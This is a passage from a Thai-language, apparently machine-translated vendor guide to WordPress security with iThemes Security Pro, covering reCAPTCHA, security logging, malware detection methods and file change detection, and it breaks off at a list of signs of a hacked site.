คุณลักษณะ Google reCAPTCHA ใน iThemes Security Pro ปกป้องไซต์ของคุณจากบอทที่ไม่ดี บอทเหล่านี้พยายามเจาะเข้าไปในเว็บไซต์ของคุณโดยใช้รหัสผ่านที่ถูกบุกรุก โพสต์สแปม หรือแม้แต่คัดลอกเนื้อหาของคุณ reCAPTCHA ใช้เทคนิคการวิเคราะห์ความเสี่ยงขั้นสูงเพื่อแยกมนุษย์และบอทออกจากกัน

สิ่งที่ยอดเยี่ยมเกี่ยวกับ reCAPTCHA เวอร์ชัน 3 คือช่วยให้คุณตรวจจับการเข้าชมบอทที่ไม่เหมาะสมบนเว็บไซต์ของคุณโดยที่ผู้ใช้ไม่ต้องดำเนินการใดๆ แทนที่จะแสดงความท้าทายของ CAPTCHA reCAPTCHA v3 จะตรวจสอบคำขอต่างๆ ที่สร้างบนไซต์ของคุณและส่งคืนคะแนนสำหรับแต่ละคำขอ คะแนนมีตั้งแต่ 0.01 ถึง 1 ยิ่งคะแนนที่ส่งคืนโดย reCAPTCHA สูง ก็ยิ่งมีความมั่นใจมากขึ้นว่ามนุษย์เป็นผู้ส่งคำขอ ยิ่งคะแนนนี้ส่งคืนโดย reCAPTCHA ต่ำ ก็ยิ่งมั่นใจมากขึ้นว่าบอทส่งคำขอ

iThemes Security Pro ให้คุณตั้งค่า เกณฑ์การบล็อก โดยใช้คะแนน reCAPTCHA Google แนะนำให้ใช้ 0.5 เป็นค่าเริ่มต้นของคุณ โปรดทราบว่าคุณสามารถล็อกผู้ใช้ที่ถูกกฎหมายโดยไม่ได้ตั้งใจ หากคุณตั้งเกณฑ์ไว้สูงเกินไป

คุณสามารถเปิดใช้งาน reCAPTCHA ในการลงทะเบียนผู้ใช้ WordPress ของคุณ รีเซ็ตรหัสผ่าน เข้าสู่ระบบ และแสดงความคิดเห็น iThemes Security Pro อนุญาตให้คุณเรียกใช้สคริปต์ Google reCAPTCHA ในทุกหน้าเพื่อเพิ่มความแม่นยำของบอทเทียบกับคะแนนของมนุษย์

ห่อ

มีบอทที่ดีและบอทที่ไม่ดี reCAPTCHA บล็อกบอทที่ไม่ดีจากเว็บไซต์ของคุณโดยไม่ขัดขวางบอทที่ดีที่ให้คุณค่า

ส่วนที่ 9: บันทึกความปลอดภัยของ WordPress

การบันทึกเป็นส่วนสำคัญของกลยุทธ์การรักษาความปลอดภัยของ WordPress การบันทึกและการตรวจสอบไม่เพียงพออาจนำไปสู่ความล่าช้าในการตรวจจับการละเมิดความปลอดภัย การศึกษาการละเมิดส่วนใหญ่แสดงให้เห็นว่าเวลาในการตรวจจับการละเมิดนั้นเกิน 200 วัน! ระยะเวลาดังกล่าวทำให้ผู้โจมตีสามารถละเมิดระบบอื่น แก้ไข ขโมย หรือทำลายข้อมูลได้มากขึ้น ด้วยเหตุผลดังกล่าว การบันทึกที่ไม่เพียงพอจึงตกอยู่ในความเสี่ยงด้านความปลอดภัยของเว็บแอปพลิเคชัน 10 อันดับแรกของ OWASP

บันทึกการรักษาความปลอดภัยของ WordPress มีประโยชน์หลายประการในกลยุทธ์ความปลอดภัยโดยรวมของคุณ

1. ระบุตัวตนและหยุดพฤติกรรมที่เป็นอันตราย
2. ระบุกิจกรรมที่สามารถเตือนคุณถึงการละเมิด
3. ประเมินความเสียหายที่เกิดขึ้น
4. ช่วยในการซ่อมแซมไซต์ที่ถูกแฮ็ก

หากไซต์ของคุณถูกแฮ็ก คุณจะต้องมีข้อมูลที่ดีที่สุดเพื่อช่วยในการตรวจสอบและกู้คืนอย่างรวดเร็ว

บันทึกการรักษาความปลอดภัยของ WordPress คืออะไร?

WordPress Security Logs ใน iThemes Security Pro จะคอยติดตามเหตุการณ์ความปลอดภัยที่สำคัญที่เกิดขึ้นบนเว็บไซต์ของคุณ เหตุการณ์เหล่านี้มีความสำคัญในการตรวจสอบเพื่อระบุว่ามีการละเมิดความปลอดภัยเกิดขึ้นหรือไม่

บันทึกการรักษาความปลอดภัยของเว็บไซต์ของคุณเป็นส่วนสำคัญของกลยุทธ์ด้านความปลอดภัยใดๆ ข้อมูลที่พบในบันทึกเหล่านี้สามารถใช้เพื่อปิดกั้นผู้ไม่ประสงค์ดี เน้นถึงการเปลี่ยนแปลงที่ไม่ต้องการบนไซต์ และช่วยในการระบุและแก้ไขจุดเข้าของการโจมตีที่ประสบความสำเร็จ

กิจกรรมความปลอดภัยที่ติดตามและบันทึกโดย iThemes Security

มาดูเหตุการณ์ความปลอดภัยของ WordPress ที่ติดตามโดยปลั๊กอิน iThemes Security Pro

1. WordPress Brute Force Attacks

การโจมตีด้วยกำลังดุร้ายหมายถึงวิธีการทดลองและข้อผิดพลาดที่ใช้เพื่อค้นหาชื่อผู้ใช้และรหัสผ่านเพื่อแฮ็คเข้าสู่เว็บไซต์ WordPress ไม่ได้ติดตามกิจกรรมการเข้าสู่ระบบของผู้ใช้ใด ๆ ดังนั้นจึงไม่มีอะไรใน WordPress ที่จะปกป้องคุณจากการโจมตีแบบเดรัจฉาน ขึ้นอยู่กับคุณที่จะตรวจสอบความปลอดภัยในการเข้าสู่ระบบเพื่อปกป้องไซต์ WordPress ของคุณ

โชคดีที่การโจมตีด้วยกำลังเดรัจฉานไม่ซับซ้อนมากนัก และค่อนข้างง่ายที่จะระบุในบันทึกของคุณ คุณจะต้องบันทึกชื่อผู้ใช้และ IP ที่พยายามเข้าสู่ระบบและการเข้าสู่ระบบสำเร็จหรือไม่ หากคุณเห็นว่าชื่อผู้ใช้หรือ IP เดียวมีการพยายามเข้าสู่ระบบที่ล้มเหลวติดต่อกัน โอกาสที่คุณกำลังอยู่ภายใต้การโจมตีแบบเดรัจฉาน

เมื่อคุณรู้ว่าเว็บไซต์ของคุณกำลังถูกโจมตี คุณสามารถหยุดมันได้! สิ่งสำคัญคือต้องจำไว้ว่าไม่มีวิธีป้องกันการโจมตีบนเว็บไซต์ของคุณ แต่ด้วยการตรวจสอบความพยายามในการเข้าสู่ระบบที่ไม่ถูกต้อง คุณสามารถป้องกันการโจมตีเหล่านั้นไม่ให้สำเร็จได้

iThemes Security Pro นั้นยอดเยี่ยมในการสกัดกั้นผู้ร้าย อย่างไรก็ตาม หากคนร้ายใช้ชื่อผู้ใช้ Bob ในการโจมตีโดยใช้กำลังเดรัจฉาน และ Bob เป็นผู้ใช้จริงในไซต์ โชคไม่ดีที่ Bob จะถูกล็อกออกไปพร้อมกับผู้โจมตี

แม้ว่าจะรู้สึกดีมากที่จะหยุดไม่ให้คนร้ายบุกเข้าไปในไซต์ แต่เราไม่ชอบที่การรักษาความปลอดภัยส่งผลต่อประสบการณ์ของผู้ใช้จริง เราได้สร้าง Magic Links เพื่อให้ผู้ใช้ที่ถูกกฎหมายสามารถเลี่ยงการล็อกเอาต์ชื่อผู้ใช้ได้ ในขณะที่ผู้โจมตีแบบ Brute Force ยังคงถูกล็อกไว้

2. การสแกนมัลแวร์

ไม่เพียงแต่คุณควรเรียกใช้การสแกนมัลแวร์ แต่คุณควรบันทึกผลลัพธ์ของการสแกนมัลแวร์ทุกครั้งในบันทึกการรักษาความปลอดภัยของ WordPress บันทึกความปลอดภัยบางรายการจะบันทึกเฉพาะผลการสแกนที่พบมัลแวร์ แต่ยังไม่เพียงพอ การแจ้งเตือนการละเมิดเว็บไซต์ของคุณเป็นสิ่งสำคัญโดยเร็วที่สุด ยิ่งคุณทราบเกี่ยวกับการแฮ็กนานเท่าไหร่ ความเสียหายที่จะเกิดขึ้นก็จะยิ่งมากขึ้นเท่านั้น

แม้ว่าจะรู้สึกดีที่ได้เห็นประวัติของแนวทางเชิงรุกในการรักษาความปลอดภัยที่ได้รับผลตอบแทน นั่นเป็นเพียงโบนัสและไม่ใช่เหตุผลในการบันทึกการสแกนมัลแวร์ทุกครั้ง

หากคุณไม่ได้บันทึกการสแกนตามกำหนดเวลา คุณจะไม่มีทางรู้ได้เลยว่าการสแกนล้มเหลวหรือไม่ การไม่บันทึกการสแกนที่ล้มเหลวอาจส่งผลให้คุณคิดว่าไซต์ของคุณได้รับการตรวจสอบทุกวันสำหรับมัลแวร์ แต่ในความเป็นจริง การสแกนไม่สำเร็จ

อ่านโพสต์สปอตไลท์ฟีเจอร์การสแกนไซต์เพื่อเรียนรู้ว่า iThemes Security Pro สามารถปกป้องคุณจากสาเหตุอันดับหนึ่งของการแฮ็ก WordPress ได้อย่างไร

3. กิจกรรมของผู้ใช้

การเก็บบันทึกกิจกรรมของผู้ใช้ในบันทึกการรักษาความปลอดภัยของ WordPress สามารถช่วยประหยัดได้หลังจากการโจมตีสำเร็จ

หากคุณตรวจสอบกิจกรรมของผู้ใช้ที่ถูกต้อง กิจกรรมนี้จะแนะนำคุณตลอดไทม์ไลน์ของการแฮ็กและแสดงทุกอย่างที่แฮ็กเกอร์เปลี่ยนแปลงไป ตั้งแต่การเพิ่มผู้ใช้ใหม่ไปจนถึงการเพิ่มโฆษณายาที่ไม่ต้องการบนไซต์ของคุณ

iThemes Security Pro ตรวจสอบกิจกรรมของผู้ใช้ 5 ประเภท:

1. เข้าสู่ระบบ / ออกจากระบบ

กิจกรรมของผู้ใช้ประเภทแรกที่บันทึกไว้คือเมื่อผู้ใช้เข้าสู่ระบบและออกจากระบบเว็บไซต์ของคุณและจากที่ใด การตรวจสอบเวลาและตำแหน่งของการเข้าสู่ระบบของผู้ใช้สามารถช่วยให้คุณระบุผู้ใช้ที่ถูกบุกรุกได้ ผู้ใช้รายนั้นเข้าสู่ระบบในเวลาที่ไม่ปกติหรือมาจากที่ใหม่หรือไม่? หากเป็นเช่นนั้น คุณอาจต้องการเริ่มการสอบสวนกับพวกเขา

2. การสร้างผู้ใช้ / การลงทะเบียน

กิจกรรมต่อไปที่คุณควรจดบันทึกไว้คือการสร้างผู้ใช้ โดยเฉพาะการสร้างผู้ใช้ที่เป็นผู้ดูแลระบบ หากแฮ็กเกอร์สามารถประนีประนอมผู้ใช้ที่ถูกต้อง พวกเขาอาจสร้างผู้ใช้ที่เป็นผู้ดูแลระบบที่นั่นเพื่อพยายามปกปิด เป็นเรื่องง่ายสำหรับคุณที่จะสังเกตเห็นสิ่งแปลก ๆ ในบัญชีของคุณ แต่เป็นการยากที่จะระบุกิจกรรมที่เป็นอันตรายในผู้ใช้รายอื่น

การตรวจสอบการลงทะเบียนผู้ใช้ก็เป็นสิ่งสำคัญเช่นกัน ช่องโหว่บางอย่างทำให้แฮกเกอร์เปลี่ยนบทบาทผู้ใช้เริ่มต้นใหม่จากสมาชิกเป็นผู้ดูแลระบบได้

หากคุณตั้งค่า User Logging ไว้เพื่อตรวจสอบกิจกรรมของผู้ใช้ Administrator เท่านั้น ระบบจะบันทึกเฉพาะการลงทะเบียนผู้ใช้ที่เป็นผู้ดูแลระบบใหม่เท่านั้นในบันทึกการรักษาความปลอดภัย ดังนั้น หากคุณเคยเห็นผู้ใช้ที่ลงทะเบียนใหม่ในบันทึกความปลอดภัยของคุณ แสดงว่ามีบางอย่างผิดพลาด

3. การเพิ่มและการลบปลั๊กอิน

สิ่งสำคัญคือต้องบันทึกว่าใครเป็นผู้เพิ่มและลบปลั๊กอิน เมื่อไซต์ของคุณถูกแฮ็ก ผู้โจมตีจะเพิ่มปลั๊กอินที่กำหนดเองเพื่อแทรกโค้ดที่เป็นอันตรายลงในเว็บไซต์ได้อย่างง่ายดาย

แม้ว่าแฮ็กเกอร์จะไม่สามารถเข้าถึงเซิร์ฟเวอร์หรือฐานข้อมูลของคุณ พวกเขาอาจยังคงสามารถเปลี่ยนแปลงได้จากแดชบอร์ด WordPress ของคุณ เมื่อใช้ปลั๊กอิน พวกเขาสามารถเพิ่มการเปลี่ยนเส้นทางไปยังไซต์ของคุณเพื่อใช้ในแคมเปญสแปมเวิร์ทไลซ์ครั้งต่อไป หรือใส่มัลแวร์ลงในฐานข้อมูลของคุณ หลังจากรันโค้ดที่เป็นอันตรายแล้ว พวกเขาสามารถลบปลั๊กอินเพื่อลบหลักฐานการก่ออาชญากรรมได้ โชคดีสำหรับเรา เราจะไม่พลาดทุกรายการเพราะทุกอย่างได้รับการบันทึกไว้ในบันทึกการรักษาความปลอดภัยของ WordPress

4. การสลับธีม

กิจกรรมผู้ใช้อื่นที่ตรวจสอบโดยการบันทึกผู้ใช้ iThemes Security Pro คือเมื่อมีคนเปลี่ยนธีมของเว็บไซต์ หากคุณเคยพบว่าธีมของคุณเปลี่ยนไปโดยไม่คาดคิด คุณสามารถดูในบันทึกการรักษาความปลอดภัยของ WordPress เพื่อดูว่าใครเป็นคนทำการเปลี่ยนแปลง

5. การเปลี่ยนแปลงในโพสต์ & เพจ

สุดท้าย คุณต้องการตรวจสอบการเปลี่ยนแปลงใดๆ ในโพสต์และเพจของคุณ มีการเพิ่มลิงก์ใด ๆ เพื่อส่งการเข้าชมของคุณไปยังไซต์อื่น ๆ หรือไม่? การตรวจสอบโพสต์และหน้าต่างๆ สามารถช่วยให้คุณพบหน้าที่น่าอับอายหรือลิงก์ที่เป็นอันตรายที่เพิ่มลงในเว็บไซต์ของคุณหลังจากการละเมิด

หากต้องการดูว่าโพสต์ใดถูกแก้ไข ให้คลิกลิงก์ ดูรายละเอียด เพื่อค้นหารหัสโพสต์

ดูโพสต์สปอตไลท์ฟีเจอร์การบันทึกผู้ใช้เพื่อเรียนรู้เพิ่มเติมว่าการตรวจสอบกิจกรรมของผู้ใช้สามารถช่วยให้คุณกลับมาจากการแฮ็กได้อย่างไร

ห่อ

การบันทึกไม่เพียงพอเป็นหนึ่งในความเสี่ยงด้านความปลอดภัยของเว็บแอปพลิเคชัน 10 อันดับแรกของ OWASP การตรวจสอบพฤติกรรมที่ถูกต้องจะช่วยให้คุณระบุและหยุดการโจมตี ตรวจจับการละเมิด และเข้าถึงและซ่อมแซมความเสียหายที่เกิดขึ้นกับเว็บไซต์ของคุณหลังจากการโจมตีสำเร็จ

ส่วนที่ 10: เมื่อ WordPress Security Disaster Strikes

แม้ว่าคุณจะปฏิบัติตามแนวทางปฏิบัติที่ดีที่สุดด้านความปลอดภัยของ WordPress แต่ก็ยังมีโอกาสที่เว็บไซต์ของคุณจะถูกบุกรุก การประนีประนอมหมายความว่าแฮ็กเกอร์ละเมิดเว็บไซต์ของคุณและติดมัลแวร์

การละเมิดความปลอดภัยคืออะไร?

การละเมิดความปลอดภัยเกิดขึ้นเมื่ออาชญากรไซเบอร์สามารถเข้าถึงเว็บไซต์หรือเซิร์ฟเวอร์ของคุณโดยไม่ได้รับอนุญาต การละเมิดความปลอดภัยสามารถเกิดขึ้นได้หลายวิธี เนื่องจากแฮกเกอร์ใช้ประโยชน์จากปัญหาด้านความปลอดภัยที่พบบ่อยที่สุดของ WordPress ตั้งแต่การใช้งานปลั๊กอินและธีมที่ล้าสมัยไปจนถึงการฉีด SQL ที่ซับซ้อนยิ่งขึ้น การละเมิดความปลอดภัยสามารถเกิดขึ้นได้กับเจ้าของไซต์ที่ระมัดระวังที่สุด

เวลาในการตรวจจับการละเมิดความปลอดภัย: ปัจจัยสำคัญในการทำความสะอาดเว็บไซต์ที่ติดไวรัส

คุณรู้หรือไม่ว่าเวลาเฉลี่ยที่ใช้ในการค้นพบการละเมิดเว็บไซต์คือ 200 วัน? ขออภัย ยิ่งคุณสังเกตเห็นการละเมิดนานเท่าไร แฮ็กเกอร์ก็ยิ่งสร้างความเสียหายให้กับเว็บไซต์ของคุณ ลูกค้า และคุณมากขึ้นเท่านั้น มัลแวร์ชิ้นหนึ่งสามารถสร้างความเสียหายได้มหาศาลใน 200 วัน นั่นเป็นเหตุผลว่าทำไมการลดเวลาที่ใช้ในการตรวจจับการละเมิดความปลอดภัยจึงเป็นสิ่งสำคัญ

ทำไม? การล้างข้อมูลและการหยุดทำงานที่คุณจะต้องทำความสะอาดเว็บไซต์ของคุณหลังจากความเสียหายที่มีมูลค่าถึง 200 วันนั้นเป็นเรื่องที่น่าสยดสยองเช่นกัน เวลาในการตรวจสอบทุกอย่างที่มัลแวร์สัมผัสและข้อมูลของลูกค้าที่ถูกขโมยนั้นเพิ่มขึ้นเฉพาะในขณะที่ยังตรวจไม่พบการละเมิด ไม่ต้องพูดถึงเวลาที่คุณต้องใช้ในการแจ้งลูกค้าว่าพวกเขาจำเป็นต้องยกเลิกบัตรเครดิตของพวกเขาเพราะแฮ็กเกอร์บันทึกการกดแป้นทั้งหมดของพวกเขาในขณะที่พวกเขาเยี่ยมชมเว็บไซต์ของคุณ

ค่าใช้จ่ายในการถูกแฮ็กนั้นดีมาก คุณต้องจ่ายเงินให้บุคคลอื่นเพื่อตรวจสอบการละเมิดและทำความสะอาดเว็บไซต์ของคุณ ผู้เชี่ยวชาญด้านการซ่อมแซมการแฮ็กจะต้องลบเว็บไซต์ของคุณในขณะที่ทำงาน และผู้คนจะไม่สามารถทำการซื้อใหม่ได้ในขณะที่เว็บไซต์ของคุณหยุดทำงาน หลังจากสูญเสียความไว้วางใจจากลูกค้าของคุณแล้ว คุณอาจสูญเสียการซื้อในอนาคตที่พวกเขาจะได้รับ

ค่าใช้จ่ายในการแฮ็กเป็นสาเหตุสำคัญที่ต้องสังเกตการละเมิดโดยเร็วที่สุด ยิ่งคุณค้นพบการละเมิดได้เร็วเท่าใด คุณก็จะสามารถหยุดความเสียหายที่จะเกิดขึ้นได้เร็วยิ่งขึ้นเท่านั้น และคุณสามารถนำเว็บไซต์และธุรกิจของคุณกลับมาออนไลน์ได้เร็วยิ่งขึ้น

เครื่องสแกนมัลแวร์เพียงพอหรือไม่

เครื่องสแกนมัลแวร์ให้วิธีการสแกนเว็บไซต์ WordPress ของคุณเพื่อหาไฟล์และสคริปต์ที่เป็นอันตรายที่รู้จัก แต่เครื่องสแกนมัลแวร์เพียงพอที่จะตรวจพบการละเมิดความปลอดภัยหรือไม่?

พูดได้คำเดียวว่าไม่ อย่าคิดว่าคุณสามารถใช้เครื่องสแกนมัลแวร์เพียงเครื่องเดียวเพื่อตรวจสอบว่าเว็บไซต์ของคุณติดไวรัสหรือไม่ ไม่มีเครื่องสแกนมัลแวร์ใดที่สามารถระบุมัลแวร์ทุกชิ้นที่มีอยู่ได้ หากคุณพบเครื่องสแกนมัลแวร์ที่อ้างว่ามีความถูกต้อง 100% คุณควรเรียกใช้เนื่องจากการสแกนที่มีการอ้างสิทธิ์เช่นนี้มักมีความแม่นยำน้อยที่สุด

ลายเซ็นเทียบกับการตรวจจับมัลแวร์ตามพฤติกรรม

การสแกนมัลแวร์และซอฟต์แวร์ป้องกันไวรัสส่วนใหญ่ใช้ลายเซ็นมัลแวร์เพื่อตรวจจับมัลแวร์ การสแกนมัลแวร์ขั้นสูงจะใช้การตรวจหาลายเซ็นและการวิเคราะห์พฤติกรรมร่วมกัน

ลายเซ็นมัลแวร์

ลายเซ็นมัลแวร์คือชุดของไบต์ที่ใช้ในการระบุมัลแวร์ที่รู้จัก เครื่องสแกนมัลแวร์บางตัวขับเคลื่อนโดยฐานข้อมูลที่เต็มไปด้วยลายเซ็นมัลแวร์ของไวรัสที่รู้จักนับล้านตัว

การสแกนมัลแวร์ตามลายเซ็นนั้นรวดเร็ว ง่ายดาย และจะตรวจจับมัลแวร์ที่รู้จักและเข้าใจดี 100% ทั้งหมดนี้ยอดเยี่ยมและจะดักจับมัลแวร์ที่เพิ่มเข้ามาโดยแฮกเกอร์ระดับต่ำ

อย่างไรก็ตาม แฮกเกอร์ที่มีทักษะรู้ว่าเครื่องสแกนมัลแวร์ตรวจสอบลายเซ็นของมัลแวร์ที่รู้จัก แฮ็กเกอร์เหล่านี้มีความสามารถในการสร้างความสับสนให้กับลายเซ็นมัลแวร์เพื่อไม่ให้เครื่องสแกนโดยเฉลี่ยของคุณตรวจไม่พบ

มัลแวร์ใหม่ถูกปล่อยออกมาในอัตราที่เครื่องสแกนมัลแวร์ไม่สามารถอัปเดตฐานข้อมูลด้วยลายเซ็นล่าสุดทั้งหมดได้ ดังนั้นเครื่องสแกนตามลายเซ็นจึงไม่สามารถบอกความแตกต่างระหว่างมัลแวร์บิตใหม่กับไฟล์ readme.txt ของปลั๊กอินได้

การวิเคราะห์พฤติกรรม

การวิเคราะห์พฤติกรรมจะตรวจสอบการกระทำของซอฟต์แวร์เพื่อดูว่าเป็นอันตรายหรือไม่ มีพฤติกรรมประเภทต่างๆ มากมายที่อาจถือว่าน่าสงสัยหรือเป็นอันตราย ตัวอย่างเช่น การสแกนไซต์ iThemes Security Pro ใช้ประโยชน์จาก Google Safe Browsing API เพื่อช่วยให้เว็บไซต์ปลอดภัย Google Safe Browsing จะตรวจสอบเพื่อดูว่าซอฟต์แวร์บางส่วนเปลี่ยนเส้นทางการรับส่งข้อมูลไปยังไซต์ที่เป็นอันตรายที่รู้จักหรือไม่

อีกครั้งไม่มีวิธีการตรวจจับมัลแวร์ที่เข้าใจผิดได้ แต่การผสมผสานระหว่างการตรวจสอบพฤติกรรมและลายเซ็นจะเพิ่มโอกาสที่คุณจะได้รับการแจ้งเตือนเมื่อมีหลักฐานการละเมิดความปลอดภัย

มัลแวร์ทั้งหมดมีพฤติกรรมอย่างไร

เราทราบดีถึงความสำคัญของการตรวจจับการละเมิดความปลอดภัยโดยเร็วที่สุด และการพึ่งพาการตรวจจับมัลแวร์เพียงอย่างเดียวไม่เพียงพอ ดังนั้นเราจึงสงสัยว่า iThemes Security Pro สามารถลดเวลาที่ผู้คนใช้ในการตรวจจับการละเมิดความปลอดภัยในเว็บไซต์ของตนได้อย่างไร

แม้ว่าประเภทของความเสียหายที่เกิดจากมัลแวร์บนเว็บไซต์ของคุณจะแตกต่างกันอย่างมาก แต่สิ่งที่ทำนั้นสามารถสรุปได้เป็นหนึ่งหรือรวมกันของสามสิ่งต่อไปนี้

1. เพิ่มไฟล์ – มัลแวร์ในรูปแบบของสปายแวร์สามารถเพิ่มไฟล์ที่เป็นอันตรายซึ่งจะบันทึกการกดแป้นของลูกค้าของคุณขณะที่พวกเขาป้อนข้อมูลบัตรเครดิต
2. ลบไฟล์ – มัลแวร์บางตัวจะลบไฟล์ที่ถูกต้องและแทนที่ด้วยไฟล์ที่เป็นอันตรายที่มีชื่อเดียวกัน
3. แก้ไขไฟล์ – มัลแวร์จะพยายามซ่อนรหัสที่เป็นอันตรายโดยการซ่อนไว้ในไฟล์ที่มีอยู่ซึ่งแก้ไข

คงจะดีไม่น้อยหากได้รับการแจ้งเตือนถึงการเปลี่ยนแปลงที่ไม่คาดคิดในเว็บไซต์ของคุณ เพื่อให้คุณสามารถตรวจสอบสัญญาณของการละเมิดความปลอดภัยได้

วิธีลดเวลาที่ใช้ในการตรวจจับการละเมิดความปลอดภัย

กุญแจสำคัญในการระบุการละเมิดความปลอดภัยอย่างรวดเร็วคือการตรวจสอบการเปลี่ยนแปลงไฟล์ในเว็บไซต์ของคุณ

ฟีเจอร์การตรวจจับการเปลี่ยนแปลงไฟล์ใน iThemes Security Pro จะสแกนไฟล์ในเว็บไซต์ของคุณและแจ้งเตือนคุณเมื่อมีการเปลี่ยนแปลงบนเว็บไซต์ของคุณ

มีเหตุผลหลายประการที่คุณเห็นกิจกรรมการเปลี่ยนแปลงไฟล์ใหม่ในบันทึกของคุณ แต่ถ้าการเปลี่ยนแปลงเกิดขึ้นโดยไม่คาดคิด คุณควรใช้เวลาเพื่อให้แน่ใจว่าการเปลี่ยนแปลงนั้นไม่เป็นอันตราย ตัวอย่างเช่น หากคุณเห็นการเปลี่ยนแปลงที่ทำกับปลั๊กอินในวันและเวลาเดียวกันกับที่คุณอัปเดตปลั๊กอิน จะไม่มีเหตุผลที่จะต้องตรวจสอบ

วิธีเปิดใช้งานการตรวจจับการเปลี่ยนแปลงไฟล์ใน iThemes Security Pro

ในการเริ่มตรวจสอบการเปลี่ยนแปลงไฟล์ ให้เปิดใช้งาน File Change Detection บนหน้าหลักของการตั้งค่าความปลอดภัย

เมื่อเปิดใช้งานการตรวจหาการเปลี่ยนแปลงไฟล์ iThemes Security Pro จะเริ่มสแกนไฟล์ทั้งหมดของเว็บไซต์ของคุณเป็น ชิ้น ๆ การสแกนไฟล์เป็นชิ้นๆ จะช่วยลดทรัพยากรที่จำเป็นในการตรวจสอบการเปลี่ยนแปลงของไฟล์

การสแกนการเปลี่ยนแปลงไฟล์เริ่มต้นจะสร้างดัชนีของไฟล์ในเว็บไซต์ของคุณและแฮชของไฟล์ แฮชของไฟล์เป็นเวอร์ชันที่สั้นกว่าและไม่สามารถอ่านได้ของเนื้อหาของไฟล์

หลังจากการสแกนครั้งแรกเสร็จสิ้น iThemes Security Pro จะสแกนไฟล์ของคุณเป็นชิ้นๆ ต่อไป หากแฮชของไฟล์เปลี่ยนแปลงในการสแกนครั้งต่อๆ ไป แสดงว่าเนื้อหาของไฟล์เปลี่ยนไป

คุณยังสามารถเรียกใช้การเปลี่ยนแปลงไฟล์ด้วยตนเองได้โดยคลิกที่ปุ่ม Scan Files Now ในการตั้งค่า File Change Detection

การเปิดใช้งานอีเมลแจ้งเตือนการเปลี่ยนแปลงไฟล์

การเปลี่ยนแปลงไฟล์เกิดขึ้นตลอดเวลา และการรับการแจ้งเตือนทางอีเมลสำหรับการเปลี่ยนแปลงทุกครั้งจะกลายเป็นเรื่องล้นหลามอย่างรวดเร็ว และก่อนที่คุณจะรู้ตัว มันก็กลายเป็นเด็กผู้ชายคนหนึ่งที่ร้องไห้ให้กับสถานการณ์หมาป่า และคุณเริ่มละเลยการแจ้งเตือนการเปลี่ยนแปลงไฟล์ทั้งหมด

มาดูวิธีที่ iThemes Security Pro ระบุการเปลี่ยนแปลงที่ถูกต้องตามกฎหมายอย่างชาญฉลาดเพื่อลดการแจ้งเตือนและวิธีปิดเสียงการแจ้งเตือนสำหรับไฟล์ที่คาดว่าจะอัปเดตบ่อยๆ

คุณสามารถจัดการการแจ้งเตือน iThemes Security ทั้งหมดได้จาก ศูนย์การแจ้งเตือน ภายในปลั๊กอิน iThemes Security จากแดชบอร์ดผู้ดูแลระบบ WordPress ของคุณ ไปที่ ความปลอดภัย > การตั้งค่า และค้นหาโมดูล ศูนย์การแจ้งเตือน

iThemes Security Pro ระบุการเปลี่ยนแปลงไฟล์ที่ถูกต้องอย่างไร

มีสองวิธีที่ iThemes Security Pro สามารถตรวจพบว่าการเปลี่ยนแปลงที่ทำกับไฟล์นั้นถูกต้องหรือไม่และไม่เป็นเหตุให้เกิดข้อกังวล iThemes Security Pro จะไม่สร้างการแจ้งเตือนการเปลี่ยนแปลงไฟล์สำหรับการเปลี่ยนแปลงที่สามารถตรวจสอบได้

1. การอัปเดตปลั๊กอิน/ธีมเสร็จสมบูรณ์โดยการจัดการเวอร์ชัน

คุณลักษณะการจัดการเวอร์ชันใน iThemes Security Pro ช่วยให้คุณสามารถอัปเดต WordPress ปลั๊กอินและธีมได้โดยอัตโนมัติ

หากการอัปเดตเสร็จสิ้นโดยการจัดการเวอร์ชัน iThemes Security Pro จะทราบแหล่งที่มาของการอัปเดตและจะไม่ทริกเกอร์การแจ้งเตือน

2. การเปรียบเทียบไฟล์สำหรับปลั๊กอินและธีม iThemes

ทำเครื่องหมายที่ช่อง Compare Files Online ในการตั้งค่า File Change Detection เพื่อเปิดใช้งานการเปรียบเทียบไฟล์ออนไลน์

ทุกครั้งที่มีการเปลี่ยนแปลงไฟล์บนเว็บไซต์ของคุณที่เป็นของปลั๊กอินหรือธีม iThemes ไฟล์นั้นจะถูกนำไปเปรียบเทียบกับไฟล์บนเซิร์ฟเวอร์ iThemes หากแฮชเป็นเวอร์ชันของไฟล์ในเว็บไซต์ของคุณตรงกับเวอร์ชันแฮชกับเวอร์ชันบนเซิร์ฟเวอร์ iThemes จะเป็นการเปลี่ยนแปลงที่ถูกต้อง และคุณจะไม่ได้รับการแจ้งเตือน

3. WordPress.org เปรียบเทียบไฟล์ออนไลน์

หากไฟล์หลักของ WordPress หรือปลั๊กอินที่ติดตั้งจากที่เก็บ WordPress.org มีการเปลี่ยนแปลง ไฟล์จะถูกเปรียบเทียบกับเวอร์ชันบน WordPress.org หากแฮชตรงกัน การเปลี่ยนแปลงจะไม่เป็นอันตราย และคุณจะไม่ได้รับการแจ้งเตือน

4. การยกเว้นด้วยตนเอง

คุณสามารถแยกไฟล์ ไดเร็กทอรี และประเภทไฟล์ออกจาก File Change Detection ในการตั้งค่า File Change Detection

กฎทั่วไปคือ การแยกไฟล์ที่คุณรู้ว่าจะอัปเดตเป็นประจำนั้นเป็นเรื่องปกติ ไฟล์สำรองและแคชเป็นตัวอย่างที่สมบูรณ์แบบสำหรับสิ่งนี้ การยกเว้นไฟล์ประเภทนี้จะช่วยลดเสียงรบกวนได้มาก

7 ลงชื่อว่าเว็บไซต์ WordPress ของคุณถูกแฮ็ก

เมื่อพบว่าตัวเองถามว่า “ ไซต์ WordPress ของฉันถูกแฮ็กหรือไม่? หมายความว่าคุณต้องการคำตอบอย่างรวดเร็ว

ยิ่งคุณสังเกตเห็นสัญญาณของการละเมิดเว็บไซต์ได้เร็วเท่าใด คุณก็จะสามารถทำความสะอาดเว็บไซต์ของคุณได้เร็วยิ่งขึ้นเท่านั้น ยิ่งคุณสามารถทำความสะอาดเว็บไซต์ของคุณได้เร็วเท่าไร ความเสียหายที่แฮ็กจะทำกับเว็บไซต์ของคุณก็น้อยลงเท่านั้น

1. หน้าแรกของคุณแตกต่าง

